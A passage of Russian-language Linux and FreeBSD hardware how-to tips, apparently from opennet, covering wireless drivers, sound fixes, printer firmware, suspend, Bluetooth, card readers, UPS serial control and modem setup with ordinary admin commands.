key="input.xkb.model" type="string">pc105</merge> <merge key="input.xkb.rules" type="string">xorg</merge> <merge key="input.xkb.layout" type="string">us,ru</merge> <merge key="input.xkb.variant" type="string">,winkeys</merge> <merge key="input.xkb.options" type="strlist">grp:lwin_toggle,grp_led:scroll</merge> </match> Думаю смысл понятен. После создания файла следует пергрузить hald и перегрузить иксы. Недостаток этого метода состоит в том, что я так и не смог настроить переключение трех языков. Второй метод: Второй метод состоит в том, что мы отключаем автоопределение устройств. Для этого в xorg.conf в секцию ServerLayout дописываем Option "AutoAddDevices" "False". После перегрузки иксов настройки клавиатуры берутся из xorg.conf. Подозреваю, что у второго метода есть свои недостатки, но я их пока не обнаружил.

Обеспечение работы беспроводной карты в Ubuntu 7.10 через ndiswrappe (доп. ссылка 1) Автор: silverghost [комментарии]

1. Устанавливаем ndiswrapper: sudo apt-get install ndiswrapper-common ndiswrapper-utils-1.9 2. Распаковываем куда нибудь Windows драйверы и пишем из под пользователя root такие команды: ndiswrapper -i bcmwl5.inf modprobe ndiswrapper echo "blacklist bcm43xx" >> /etc/modprobe.d/blacklist echo "ndiswrapper" >> /etc/modules 3. Перегружаемся и проверяем. Все должно работать.

Установка неподдерживаемой сетевой карты ASUS NX1001 во FreeBSD 6.2 Автор: fenixfenix [комментарии]

При установке сетевой карточки Asus NX1001, я не смог обнаружить её при наборе команды ifconfig. А также в sysinstall->Configure->Networking. Первое, что мне пришло в голову конфликт с ACPI, после отключения в БИОСе ACPI - результатов никаких не дало. Поэтому пришлось заняться поисками решения этой проблемы копаясь в интернете, особо на сайте freebsd.org. Найдя похожую проблему работы с сетевой картой Asus NX1001 в FreeBSD 6.2, вот что в итоге необходимо было сделать. Набрав команду pciconf -lv и найдя среди результатов вывода "Sundance ST201 10/100BaseTX". Мне пришлось дописать в файлах: /usr/src/sys/pci/if_ste.c /usr/src/sys/pci/if_stereg.h нижеследующее (строка AS_VENDORID...), в файле if_ste.c: static struct ste_type ste_devs[]={ {ST_VENDORID, ST_DEVICEID_ST201,"Sundance ST201 10/100BaseTX"}, {AS_VENDORID, AS_DEVICEID_NX1001,"ASUS NX1001 10/100BaseTX"}, {DL_VENDORID, DL_DEVICEID_DL100050,"D-Link DL10050 10/100BaseTX"}, {0,0,NULL} }; в файле if_stereg.h: #define AS_VENDORID 0x13F0 #define AS_DEVICEID_NX1001 0x0200 После этого мы обязаны пересобрать наше старое ядро: cd /usr/src/sys/i386/conf/ cp GENERIC GATEWAY ee GATEWAY config GATEWAY cd ../compile/GATEWAY make depend make make install shutdown -r now В итоге в нашем случае появляется сетевая карточка в устройствах как sto0.

Nokia в Ubuntu Linux. Подключение, настройка и работа. (доп. ссылка 1) Автор: openkazan.info [комментарии]

Настройка линукса для работы с телефоном Nokia, подключеным к системе через USB кабель. В этой статье будем настраивать линукс для работы с вашим телефоном Nokia, подключеным к системе через USB кабель. Система Ubuntu Feisty Linux 7.04, хотя аналогичным образом можно настроить в любом другом дистрибутиве. 1) Ставим необходимый софт: apt-get install obexftp openobex-apps 2) Далее в консоли: lsusb на выходе получаем: Bus 003 Device 003: ID 0421:043a Nokia Mobile Phones из этого узнаем VendorID и ProductID: VendorID = 0421 ProductID = 043a 3) Прописываем эти данные в /etc/udev/rules.d/040-permissions.rules: sudo vim /etc/udev/rules.d/040-permissions.rules в конец файла вписываем: BUS=="usb", SYSFS{idVendor}=="VendorID", SYSFS{idProduct}=="ProductID", GROUP="plugdev", USER="yourUserNname" VendorID и ProductID заменяем нашими данными полученными выводом команды lsusb USER="имя пользователя под которым вы работаете в системе" 4) Создаём кнопку запуска на рабочем столе. В её свойствах прописываем: java -jar /home/YOURUSERNAME/obexftp-frontend-0.6.1-bin/OBEXFTPFrontend.jar YOURUSERNAME меняем на вашу домашнюю папку 5) Запускаем /usr/bin/obexftp В вкладке Transport выбираем USB, Value 1 Далее OK. Всё, настройка закончена. Запускаем программу через созданную нами на рабочем столе кнопку запуска. В появившемся окошке видим drive c: - это наша memory card. Процесс закачки и выгрузки файлов понятен интуитивно. Удачной работы!:)

Решение проблемы отсутствия звука в ноутбуках с чипсетом Intel 82801G (доп. ссылка 1) Автор: openkazan.info [комментарии]

Как ни странно, но в ноутбуках с аудио чипсетом 82801G от Intel (фирмы с которой обычно нет проблемм) под линуксом не работает звук. Причём проблемма существует на любых дистрибутивах (проверено при прочтении форумов с аналогичной проблеммой) и на ноутах самых разных производителей. ОС на которых мы пытались завести звук: Ubuntu 7.04 Feisty, Ubuntu 7.10 Gutsy, Fedore Core 7. Ноутбуки на которых люди столкнулись с проблеммой отсутствия звука на 82801G: Acer aspire 5310, Acer Aspire 3682, Acer TravelMate 2490, Toshiba L40-13G, Sony Vaio SZ110, Compaq nx7400, IBM Thinkpad Z61m и многие другие... Во всех системах признаки одни и те же: если звук появляется, то тихий и из левой колонки слышен пронзительный "свист". Если переместить ползунок регулировки громкости - звук пропадает совсем. Данное решение проблеммы описано на модели Toshiba L40-13G И так, $lspci |grep Audio выдаёт нам следующее: 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 02) Решение давольно простое: В Ubuntu: $sudo vim /etc/modprobe.d/alsa-base добавить в конце файла строку options snd-hda-intel model=3stack в FedoraCore $sudo vim /etc/modprobe.conf там где options snd-hda-intel ... в конце строки добавить model=3stack в других дистрибутивах делать аналогично далее $sudo update-modules или перезагрузка и должно всё работать:)

Выбор и настройка VoIP usb-телефона под linux. (доп. ссылка 1) Автор: Сергей Вольхин [комментарии]

Выбор. Меня интересовала не просто работа микрофона и динамика, но и как минимум клавиатуры. Выбор пал на Skypemate p1K (в девичестве Yealink), как не на очень дорогой апппарат, при этом имеющий как полноценную клавиатуру ("как у мобильника"), так и простенький ЖК-дисплей. Ко всему прочему поддержка именно этого девайса в linux наиболее развита. Настройка. Поддержка собственно звука не требует практически никакой настройки. Девайс определяется как новая звуковая карта: -bash-2.05b# cat /proc/asound/cards .... USB-Audio - VOIP USB Phone Yealink Network Technology Ltd. VOIP USB Phone at usb-0000:00:03.0-3 В SIP-клиенте достаточно выбрать например "/dev/dsp2" в качеcтве динамика/микрофона. Что касается клавиатуры, то с этим ситуация несколько сложней. Есть несколько проектов разной степени работоспособности: 1. SkypeMate (http://skypemate.ru/support/docs/) - официальный драйвер. Бинарный, только для FedoraCore 3 (требует старый dbus-0.23). Плюс ко всему только для Skype. Отдельные джидаи запускали его на современных дистрибутивах с подменой либы dbus, с периодическими сегфолтами, я с этим заморачиваться не стал. 2. USBB2K-API (http://savannah.nongnu.org/projects/usbb2k-api/) - неофициальный драйвер. По отзывам пользователей - работает, однако у меня он не завелся. Девайс определялся, команды на телефон шли, однако обратной связи не наблюдалось. При этом на форумах отписывали пользователи с аналогичной проблемой, разработчики пытались им даже помочь, но дело там так и не сдвинулось с мертвой точки. 3. yealink-module (http://savannah.nongnu.org/forum/forum.php?forum_id=4319) - как видно из названия модуль для ядра. Последняя версия из CVS у меня собралась лишь после жесткой правки исходников и после этого кончено нормально не работала, однако релиз за номером 0861 собрался сразу и без проблем был установлен. Замечу, что поддержка клавиатуры в нем реализована просто и универсально: клавиши телефона дублируют клавиши клавиатуры (цифровые, backspace, enter и т.д.) Оригинал статьи (со ссылками) здесь: http://damnsmallblog.blogspot.com/2007/07/usb-linux.html

Установка принтера HP1020 в Debian Еtch Автор: Андрей Никитин [комментарии]

Принтеры HP LaserJet 1000,1005,1018,1020 после включения должны загрузить бинарный firmware драйвер. Если прошивка по каким-то причинам не загружена (загрузка обычно устанавливается в автомате через hotplug), то вывод usb_printerid будет примерно таким nik@linuxdvr:~$ usb_printerid /dev/usb/lp0 GET_DEVICE_ID string: MFG:Hewlett-Packard;MDL:HP LaserJet 1020;CMD:ACL;CLS:PRINTER;DES:HP LaserJet 1020; без упоминания версии прошивки в конце строки (FWVER:20041129;) Устанавливаем штатный deb-пакет foo2zjs он ставит все что нужно, за исключением самой прошивки и в логе tail -n 20 /var/log/messages вы увидите что-то подобное Mar 20 12:35:34 linuxdvr kernel: usbcore: registered new driver usblp Mar 20 12:35:34 linuxdvr kernel: drivers/usb/class/usblp.c: v0.13: USB Printer Device Class driver Mar 20 12:35:35 linuxdvr /usr/bin/hplj1020: Missing HP LaserJet 1020 firmware file /usr/share/foo2zjs/firmware/sihp1020.dl Mar 20 12:35:35 linuxdvr /usr/bin/hplj1020: ...read foo2zjs installation instructions and run ./getweb 1020 Выполняю: nik@linuxdvr:~$ getweb 1020 в итоге c инета сайта foo2zjs качается прошивка и сохраняется как sihp1020.img конвертируем этот бинарник в нужный формат nik@linuxdvr:~$ arm2hpdl sihp1020.img > sihp1020.dl далее копируем куда нужно nik@linuxdvr:~$ sudo mv sihp1020.dl /usr/share/foo2zjs/firmware/ и корректируем владельца группу nik@linuxdvr:~$ sudo chown root:root /usr/share/foo2zjs/firmware/sihp1020.dl Включаем и выключаем принтер и в логе tail -n 20 /var/log/messages видим Mar 20 12:57:18 linuxdvr /usr/bin/hplj1020: loading HP LaserJet 1020 firmware /usr/share/foo2zjs/firmware/sihp1020.dl to /dev/usb/lp0 ... Mar 20 12:57:19 linuxdvr /usr/bin/hplj1020: ... download successful. Проверяем: nik@linuxdvr:~$ usb_printerid /dev/usb/lp0 GET_DEVICE_ID string: MFG:Hewlett-Packard;MDL:HP LaserJet 1020;CMD:ACL;CLS:PRINTER;DES:HP LaserJet 1020;FWVER:20041129; FWVER:20041129; - это версия успешно загруженной прошивки Все, теперь идем в KDE, GNOME или ... и запускаем ОТ ROOT-а гуёвые мастера для добавления принтера. На всякий случай, привожу установленные в Debian Etch пакеты для печати на HP1020 через CUPS. nik@linuxdvr:~$ aptitude search "foo|cups|foo2" | grep "^i" i cupsys - Common UNIX Printing System(tm) - server i cupsys-bsd - Common UNIX Printing System(tm) - BSD comm i cupsys-client - Common UNIX Printing System(tm) - client p i A cupsys-common - Common UNIX Printing System(tm) - common f i cupsys-driver-gutenprint - printer drivers for CUPS id foo2zjs - Support for printing to ZjStream-based pri i A foomatic-db - linuxprinting.org printer support - databa i foomatic-db-engine - linuxprinting.org printer support - progra i foomatic-db-gutenprint - linuxprinting.org printer support - databa i foomatic-db-hpijs - linuxprinting.org printer support - databa i A foomatic-filters - linuxprinting.org printer support - filter i foomatic-filters-ppds - linuxprinting.org printer support - prebui i foomatic-gui - GNOME interface for configuring the Foomat i gnome-cups-manager - CUPS printer admin tool for GNOME i A libcupsimage2 - Common UNIX Printing System(tm) - image li i A libcupsys2 - Common UNIX Printing System(tm) - libs i A libgnomecups1.0-1 - GNOME library for CUPS interaction i A libgnomecupsui1.0-1c2a - UI extensions to libgnomecups i A python-foomatic - Python interface to the Foomatic printer d (С) Андрей Никитин, 2007 Перепечатка и цитирование допускаются только с разрешения автора.

Установка CentOS и FC 6 на материнские платы Intel P965 (ICH8R) с IDE-CDROM Автор: Державец Борис [комментарии]

Установка CentOS 4.4 (RHEL AS 4.4) и FC 6 на материнские платы с чипсетом Intel P965 & Intel ICH8R с IDE-CDROM'a. 1.Установить в BIOS режим AHCI для Intel ICH8R и Jmicron JMB363 2.На подсказке boot:linux all-generic-ide pci=nommconf 3. Cпецифицировать во время графической установки Kernel boot options : all-generic-ide pci=nommconf При установке GRUB в /boot partition выполнить: boot:linux all-generic-ide pci=nommconf rescue ................... # chroot /mnt/sysimage # df -h /dev/sdaX ....... /boot ............................. # dd if=/dev/sdaX of=linux.bin bs=512 count=1 # mcopy linux.bin a: Такой стиль установки позволяет системам успешно определять IDE-CDROM не только при установке , но и в рабочем режиме.

Новый способ использования NDIS во FreeBSD 5.x и 6.x (доп. ссылка 1) Автор: Kond [комментарии]

Все статьи на opennet описывают создание модуля NDIS для FreeBSD старым методом: ndiscvt -i *.inf -s *.sys -o ndis_driver_data.h Данный способ уже давно устарел и теперь нужно использовать программу ndisgen. Например. Имеем файлы из комплекта Windows драйверов: Fw1130.bin - Network interface firmware. FwRad16.bin - Radio firmware. TNET1130.INF - Driver information file. tnet1130.sys - Driver binary. Старый способ: cd /sys/modules/ndis make depend make make install cd ../if_ndis ndiscvt -i TNET1130.INF -s tnet1130.sys -f Fw1130.bin -o ndis_driver_data.h make depend make make install ndiscvt -f FwRad16.bin cp FwRad16.bin.ko /boot/kernel kldload FwRad16.bin kldload if_ndis Для автоматизации загрузки помещаем в /boot/loader.conf FwRad16.bin_load="YES" if_ndis_load="YES" Новый способ (не требует установки исходных текстов ядра): ndisgen ... отвечаем на интерактивные вопросы, на выходе получаем tnet1130_sys.ko cp tnet1130_sys.ko /boot/kernel/ kldload ndis kldload if_ndis kldload tnet1130_sys Для автоматизации загрузки помещаем в /boot/loader.conf ndis_load="YES" if_ndis_load="YES" tnet1130_sys_load="YES"

Как в Linux решить проблему конфликта тачпада и мыши на ноутбуке (доп. ссылка 1) Автор: rmcgowan [комментарии]

Некоторые проблемы совместной работы мыши и Touchpad можно решить, добавив параметр загрузки ядра: psmouse.proto=imps Ниже пример настройки Touchpad и внешней мыши для X.Org: # Тачпад Section "InputDevice" Driver "synaptics" Identifier "Mouse2" Option "Device" "/dev/psaux" Option "Edges" "1900 5400 1800 3900" Option "Finger" "25 30" Option "MaxTapTime" "20" Option "MaxTapMove" "220" Option "VertScrollDelta" "100" Option "MinSpeed" "0.02" Option "MaxSpeed" "0.18" Option "AccelFactor" "0.0010" EndSection # USB мышь Section "InputDevice" Identifier "Mouse1" Driver "mouse" Option "Protocol" "IMPS/2" Option "Device" "/dev/input/mice" Option "ZAxisMapping" "4 5" Option "Buttons" "5" EndSection Section "ServerLayout" .... InputDevice "Mouse2" "CorePointer" InputDevice "Mouse1" "SendCoreEvents" EndSection

Засыпание ноутбука с сохранением данных в памяти (Suspend to RAM) (доп. ссылка 1) (доп. ссылка 2) [обсудить]

cat /proc/acpi/sleep S0 S3 S4 S4bios S5 Первым делом попробовать: echo 4b > /proc/acpi/sleep Если не получилось, ядро нужно грузить с параметрами "noapic acpi_sleep=s3_bios" Далее если в ядро входят патчи swsusp (/dev/hda5 - swap раздел, который должен быть раза в два больше ОЗУ): append=" resume=/dev/hda5" или для swsusp2: append=" resume2=swap:/dev/hda5" Если swsusp перестал вообще грузить систему, используйте параметр ядра "noresume" для игнорирования resume образа. # Сохраняем статус видеокарты (http://www.srcf.ucam.org/~mjg59/vbetool/) vbetool vbestate save > ~/VBESTATE # Засыпаем. echo 3 > /proc/acpi/sleep # Восстанавливаем статус видеокарты после просыпания. vbetool post vbetool vbestate restore < ~/VBESTATE Другой вариант засыпания: echo "mem" >> /sys/power/state echo "disk" >> /sys/power/state После просыпания лучше перезапустить hotplug: service hotplug restart Еще лучше до засыпания остановить, а после просыпания загрузить сервисы: usb acpid sound irda pcmcia Можно скачать готовый скрипт hibernate с http://www.suspend2.net/downloads/all/ Для засыпания по закрытию крышки, создаем /etc/acpi/events/lid event=button[ /]lid.* action=echo "3" > /proc/acpi/sleep При нажатии на кнопку питания, создаем /etc/acpi/events/powerbtn event=button[ /]power.* action=echo "3" > /proc/acpi/sleep Советы по экономии батареи для ноутбуков на базе Pentium Mobile Centrino: http://wiki.teuwen.org/DebianLaptop

Подключение Bluetooth гарнитуры в Fedora Core Linux 4 (доп. ссылка 1) Автор: John G. Moylan [комментарии]

Устанавливаем поддержку bluetooth (проект Bluez): yum install bluez-libs bluez-pin bluez-utils bluez-hcidump bluez-utils-cup Устанавливаем утилиты звуковой подсистемы ALSA: yum install alsa-tools alsa-lib alsa-utils alsa-lib-devel Устанавливаем automake (понадобится для сборки BTSCO) yum install automake Проверяем на сайте http://bluetooth-alsa.sourceforge.net/ поддерживается ли наша гарнитура (Jabra BT200 поддерживается). Запускам hcitool и смотрим активна ли bluetooth подсистема. Подключаем гарнитуру и запускаем "hcitool scan", смотрим MAC адрес в результатах вывода. Далее, подключаем через: hcitool cc MAC Все должно работать, но на случай проблем, пример некоторый файлов из /etc/bluetooth: hcid.conf options { autoinit yes; security user; pairing multi; # PIN helper pin_helper /etc/bluetooth/feed-pin.sh; # D-Bus PIN helper #dbus_pin_helper; } device { name "%h-%d"; # Local device class class 0x120104; # Inquiry and Page scan iscan enable; pscan enable; lm accept; lp rswitch,hold,sniff,park; # Authentication and Encryption (Security Mode 3) auth enable; encrypt enable; } rfcomm.conf rfcomm0 { # Automatically bind the device at startup bind no; # Bluetooth address of the device device 11:11:11:11:11:11; # RFCOMM channel for the connection channel 1; # Description of the connection comment "Bluetooth Device } /etc/bluetooth/feed-pin.sh #!/bin/sh echo "PIN:0000" Установка BTSCO из исходных текстов. Получаем исходные тексты из CVS: cvs -d:pserver:anonymous@cvs.sf.net:/cvsroot/bluetooth-alsa log cvs -d:pserver:anonymous@cvs.sf.net:/cvsroot/bluetooth-alsa co btsco Собираем утилиты: ./bootstrap ./configure make make install make maintainer-clean Собираем модуль ядра: cd kernel make make install depmod -e make clean Подгружаем модуль ядра: modprobe snd-bt-sco Подключаемся к гарнитуре: btsco -v MAC Небольшой скрипт для автоматизации запуска skype: #!/bin/sh modprobe modprobe snd-bt-sco btsco MACofHeadset skype

Монтирование в Linux флеш-карт, отформатированных цифровой фотокамерой Автор: Гусев Андрей [комментарии]

После удачно завершившейся разборки с "multiple LUN support" для доступа к девайсам карт-ридеров (MAUSB-300 производства OLYMPUS и безымянный "11 in 1" Тайваньского производства) оказалось, что карты xd-Picture (OLYMPUS) и SD (Transcedent), отформатированные в соответствующих аппаратах (фотокамера CAMEDIA C55ZOOM, и наладонник PalmOne Tungsten E2) монтироваться всё-таки не хотят. По выяснении обстоятельств оказалось что монтировать их нужно с указанием параметра offset: xd 16Mb - 20992 (0x5200) xd 128Mb - 24064 (0x5E00) xd 256Mb - 25088 (0x6200) sd 128Mb - 49664 (0xC200) sd 256Mb - 51712 (0xCA00) т.е., например, вот так: > mount -t vfat -o loop,offset=20992 /dev/sda /mnt/ttt После модификации содержимого карт (добавления/удаления файлов), смонтированных таким образом соответствующие аппараты не высказывают к этому самому содержимому (и к файловой системе карт) никаких претензий, т.е. читают его и понимают правильно.

Как настроить параметры ISA карты под FreeBSD и Linux [комментарии]

FreeBSD: /boot/kernel.conf (для карты на 0x300 порту, прерывание 10, IO адрес 0xd8000): en ed0 po ed0 0x300 ir ed0 10 iom ed0 0xd8000 f ed0 0 q Linux: modprobe 3c501 io=0x300 irq=10 или в /etc/modules.conf alias eth0 3c501 options 3c501 io=0x300 irq=10 Если карта PNP (пакет isapnptools), параметры смотрим через pnpdump и помещаем в /etc/isapnp.conf.

Как протестировать целостность ОЗУ не останавливая машину на memtest (доп. ссылка 1) Автор: poige [комментарии]

получим кучу несжимаемых данных dd if=/dev/urandom of=random.dat bs=1M count=БОЛЬШЕРАЗМЕРАОЗУ bzip2 -c < random.dat > random2.dat.bz2 распакуем в /dev/null (можно и на диск конечно) bzip2 -dc < random2.dat.bz2 > /dev/null Сбой обычно выглядит так: bzcat: Data integrity error when decompressing.

Настройка WebCam на чипе OV511/OV511+ под FreeBSD (доп. ссылка 1) Автор: denz [комментарии]

#!/bin/sh # Scriptec greb webcam cur_date=`date \+\%d.\%m.\%Y` cur_time=`date \+\%H:\%M` cam_dir=/home/virtual/denz/htdocs/cam /usr/local/bin/vid -d /dev/ugen0 --small | pnmtojpeg --quality=72 --optimize --smooth 10 \ --progressive --comment="TiraNET Office (67700, Ukraine, Belgorod-Dnestrovsky, P/O Box 4) "\ > /tmp/webcam_shot.jpg rm -f ${cam_dir}/camout.jpg /usr/local/bin/convert -normalize -fill white -font helvetica -antialias \ -draw "text 45,230 'WebCam in kladovka [ $cur_time @ $cur_date ]'" \ /tmp/webcam_shot.jpg ${cam_dir}/camout.jpg rm -f /tmp/webcam_shot.jpg chown -R denz:www ${cam_dir}/*

Синхронизация Smartphone Motorola MPx200 под Linux (доп. ссылка 1) [комментарии]

Есть два способа как заставить MPX200 работать с Linux: IrDA и wince-usb. 1. Подключение через IrDA (SIR): Устанавливаем параметры для SiR порта /bin/setserial /dev/ttyS1 port 0x6f8 irq 3 uart 8250 baud_base 115200 irattach /dev/ttyS1 -s Для RedHat-based Linux дистрибутивов делаем проще: В /etc/sysconfig/irda IRDA=yes DEVICE=/dev/ttyS1 DISCOVERY=yes # service irda start Запускем демон синхронизации (не из под root). Качаем с http://synce.sourceforge.net $ dccm Если используется пароль запускаем как "dccm -p пароль" Один раз указываем используемый порт. # synce-serial-config ircomm0 Стартуем pppd (про hotplug, ниже) # synce-serial-start Проверяем. $ pstatus Version ======= Version: 4.20.0 (Microsoft Windows Mobile 2003 for Pocket PC Phone Edition (?)) Platform: 3 (Windows CE) ..... Завершаем сеанс # synce-serial-abort 2. Подключение по USB. Для 2.4.x ядра используем user space драйвер wince-usb http://cvs.sourceforge.net/viewcvs.py/synce/wince-usb/ + http://libusb.sourceforge.net (последние 2.6.x ядра должны работать с модулями ipaq и usb-serial из коробки). Патчим. В самом начале ipaqd.c меняем значения IPAQ_ENDPOINT на #define IPAQ_ENDPOINT_IN 0x82 #define IPAQ_ENDPOINT_OUT 0x02 Далее в devlist[] добавляем { 0x045e, 0x00ce, "Motorola MPX200" }, Создаем /usr/local/bin/cebox.sh взяв пример из README к wince-usb, например: #!/bin/sh /usr/sbin/pppd nocrtscts local debug passive silent 192.168.1.1:192.168.1.2 ms-dns 192.168.1.1 noauth proxyarp $ dccm Подключаем телефон и сразу запускаем # rmmod ipaq (пока не поправили hotplug) # ipaqd 2>/var/log/ipaqd.log Далее запускаем synce-serial-* как в предыдущем шаге. 3. Настройка HotPlug (чтобы все запускалось автоматически). В /etc/hotplug/usb.agent добавляем после блока с "LABEL="USB product $PRODUCT": if [ "$PRODUCT" = "45e/ce/0" ]; then /etc/hotplug/usb/ipaq exit 0 fi Создаем /etc/hotplug/usb/ipaq #!/bin/bash killall -9 ipaqd killall dccm su -c /usr/bin/dccm /user/ /usr/local/bin/ipaqd 2>/var/log/ipaq.log 4. Стандартные команды synce: pcp - копирование файлов (аналог cp) pls - список файлов в директории (аналог ls) pmkdir - создание директории (аналог mkdir) pmv - перенос/переименование файлов (аналог mv) prm - удаление файлов (аналог rm) prmdir - удаление директорий prun - запуск программы на устройстве pstatus - статус устройства synce-install-cab - установка на устройство .cab файла orange - позволяет выдрать .cab из .exe инсталлера; В Modnight Commander удобно использовать VFS понимающую команды "cd #synce" и "cd #synceroot", правда модуль раздаваемый на сайте synce у меня не заработал, пришлось его переписать: ftp://ftp.opennet.ru/pub/sys/shell/synce-mcfs-patched/ Для работы, копируем файлы synce и synceroot в /usr/lib/mc/extfs К extfs.ini добавляем: synce synceroot Хорошая графическая оболочка для синхронизации календаря и адресной книги - MultiSync (http://multisync.sourceforge.net/)

Как подключить USB Card Reader к Linux [обсудить]

Для работы с многокарточными кардридерами необходимо чтобы ядро было собрано с опцией CONFIG_SCSI_MULTI_LUN=y или подгрузить модуль mod_scsi с параметром max_scsi_luns=N, иначе Linux будет воспринимать только первый слот кардридера. Проверить можно, например, так: zcat /proc/config.gz | grep CONFIG_SCSI_MULTI_LUN Решение 1. При использовании mod_scsi добавить в /etc/modules.conf: options scsi_mod max_scsi_luns=4294967295 Решение 2. Заставить ядро опрашивать больше одного LUN у одного устройства. cat /proc/scsi/scsi и находим первый LUN нашего кардридера. Host: scsi1 Channel: 00 Id: 00 Lun: 00 выбор цифр ^ ^ ^ Далее: echo "scsi add-single-device 1 0 0 1" > /proc/scsi/scsi echo "scsi add-single-device 1 0 0 2" > /proc/scsi/scsi echo "scsi add-single-device 1 0 0 3" > /proc/scsi/scsi ... Для удобства монтирования можно прописать в /etc/fstab: /dev/sda1 /mnt/smcard auto user,noauto,noexec,mode=0444,rw,sync,codepage=866,iocharset=koi8-r 0 0 /dev/sdb1 /mnt/cfcard auto user,noauto,noexec,mode=0444,rw,sync,codepage=866,iocharset=koi8-r 0 0 /dev/sdc1 /mnt/sdcard auto user,noauto,noexec,mode=0444,rw,sync,codepage=866,iocharset=koi8-r 0 0 /dev/sdd1 /mnt/mscard auto user,noauto,noexec,mode=0444,rw,sync,codepage=866,iocharset=koi8-r 0 0 PS. Для 2.6.x ядра: echo 8 > /sys/module/scsi_mod/parameters/max_luns

Как не разбирая корпус посмотреть модель материнской платы (доп. ссылка 1) Автор: Anton V. Yuzhaninov [комментарии]

1. Просмотреть содержимое BIOS (проверял под Linux и FreeBSD) dd if=/dev/mem bs=64k skip=15 count=1 | strings | less в первых строчках обычно упоминается название материнской платы. 2. Воспользоваться утилитой dmidecode

Как в Linux посмотреть порт/прерывание для ISA/PCI устройств. [обсудить]

pnpdump -c > isapnp.conf - дамп isa/pnp параметров isapnp isapnp.conf - установить параметры после изменения isapnp.conf lspci, lspci -v, lspci -vvv - список pci устройств. scanpci или lspcidrake - найдет модули Linux ядра соответствующие устройствам (пакеты libhw-tools и ldetect). lshw - покажет исчерпывающую информацию о USB и PCI устройствах. setpci - поменять параметры pci устройства cat /proc/iomem cat /proc/ioports cat /proc/interrupts

Управление APC UPS через serial порт. [комментарии]

cu -s 2400 -e -o -h -l /dev/cuaa0 # 2400 Baud, 8 Data Bits, 1 Stop Bit, No Parity Команды: Y - переход в командный режим, только после Y будут выполняться остальные команды; K - выключение UPS через 15-30 сек. (K, задержка 1 сек, К, задержка 1 сек, <CR>); A, X, U и W - самотестироание; R - окончание сессии; L - Напряжение на входе; O - Напряжение на выходе; B - Вольтаж батареи; F - Частота в сети, Hz; M, N - максимальное и минимальное заргистрированное напряжение в сети; P - потребление энергии в %; C - температура. Когда нет питания UPS шлет '!' каждые 5 секунд, если питание появилось - шлет '$'.

Как подключить USB Flash накопитель в FreeBSD (доп. ссылка 1) [комментарии]

man umass Конфигурация ядра (FreeBSD 4.8 можно не пересобирать): device usb device ohci (OR device uhci) device umass device scbus device da device pass В логе смотрим подобное сообщение "da0 at umass-sim0 bus 0 target 0 lun 0" Монтируем: mount -t msdos /dev/da0s1 /mnt

Почему Linux ядро не использует всю память и пишет "Warning only 960MB will be used". [комментарии]

Если добавление в lilo append="mem=1536M" не помогает: Необходимо пересобрать 2.2.x ядро с опцией CONFIG_2GB=y Processor type and features -> Maximum Physical Memory -> 2Gb Если проблема проявляется в ядре 2.4.x - CONFIG_HIGHMEM, CONFIG_HIGHMEM4G или CONFIG_HIGHMEM64G

Включение Hyper-Threading scheduler в Linux, для CPU Xeon. (доп. ссылка 1) [комментарии]

Linux поддерживает Hyper-Threading начиная с ядра 2.4.17. Ядро должно быть собрано как SMP, При загрузке, передаем параметр acpismp=force (в lilo: append=" acpismp=force") проверка работы: cat /proc/cpuinfo, если среди flags есть "ht", то Hyper-Threading активирован.

Как под Linux установить параметры serial порта (прерывание, адрес порта) [обсудить]

/bin/setserial -b /dev/ttyS2 uart 16450 port 0x2E8 irq 5

Как уменьшить нагрев процессора AMD Athlon/Duron под Linux [комментарии]

Активируем ACPI в ядре (при включенном ACPI не будет работать APM): "general.setup" активируем "acpi subsystem", "acpi bus" и "acpi Processor entry". Для Via kt133/133a и kx133: Включить "охлаждение": setpci -v -H1 -s 0:0.0 52=EB Выключить: setpci -v -H1 -s 0:0.0 52=6B Для Via kt266/266a: Включить: setpci -v -H1 -s 0:0.0 92=EB Выключить: setpci -v -H1 -s 0:0.0 92=6B

Как исправить падения Linux на AMD Athlon/Duron + AGP ? [обсудить]

В /etc/lilo.conf необходимо добавить append="mem=nopentium", например: image=/boot/vmlinuz label=linux root=/dev/hda1 append="mem=nopentium console=tty12 hdc=ide-scsi"

Как на сервере обеспечить подключение PS/2 клавиатуры, без перезагрузки [комментарии]

Для того чтобы на загруженный без PS/2 клавиатуры сервер, можно было в любой момент подключить клавиатуру без перезагрузки, нужно в конфигурации ядра заменить строку: device atkbd0 at atkbdc? irq 1 flags 0x1 на device atkbd0 at atkbdc? irq 1 Т.е. убрать 'flags 0x1' и тем самым разрешить загружать драйвер клавиатуры при отключенной в момент загрузки клавиатуре.

Настройка работы WiMax в Ubuntu Linux 9.04 Автор: Вершинин Егор [комментарии]

Имеем: Ubuntu Linux 9.04 Yota WiMax модем Samsung SWC-U200 и большое желание этот модем использовать в Ubuntu :) Алгоритм: 1) В запущенной Ubuntu запускаем программу gnome-terminal (Приложения \ Стандартные \ Терминал) 2) Переходим в привилегированный режим (становится пользователем root) - выполняем команду: sudo su и вводим свой пароль от учетной записи. 3) Скачиваем последнюю версию драйвера MadWiMax следующей командой: wget http://madwimax.googlecode.com/files/madwimax-0.1.0.tar.gz Примечание: Для этого нужно активное интернет-подключение. 4) Теперь распаковываем и переходим в созданный каталог: tar -xf madwimax-0.1.0.tar.gz cd madwimax-0.1.0/ 5) Дальнейший шаг - нужно установить библиотеки libusb1.x (т.к. драйвер madwimax основан на ней): apt-get install libusb-1.0-0-dev программа запросит подтверждение своих действий - соглашается 6) Теперь можно скомпилировать и установить драйвер следующими командами: ./configure make make install после установки скопируйте вручную получившийся бинарник madwimax следующей командой: cp src/madwimax /usr/bin/ 7) Далее: Подключаем модем, ждем 10-20 секунд. 8) Запускаем программу madwimax следующей командой: /usr/bin/madwimax программа должна написать примерно следующее: Device found Claimed interface Allocated tap interface: wimax0 теперь мы должны набрать команду ifconfig и убедиться, что сетевой интерфейс wimax0 у нас появился. 9) Последний шаг - осталось запустить DHCP-клиент и получить настройки IP-адреса, шлюза и DNS-сервера: dhclient Примечание: Перед выполнение команды dhclient отключите текущее интернет-подключение.

Установка ATI Catalyst 8.5 в Ubuntu 8.04 (доп. ссылка 1) Автор: Pronix [комментарии]

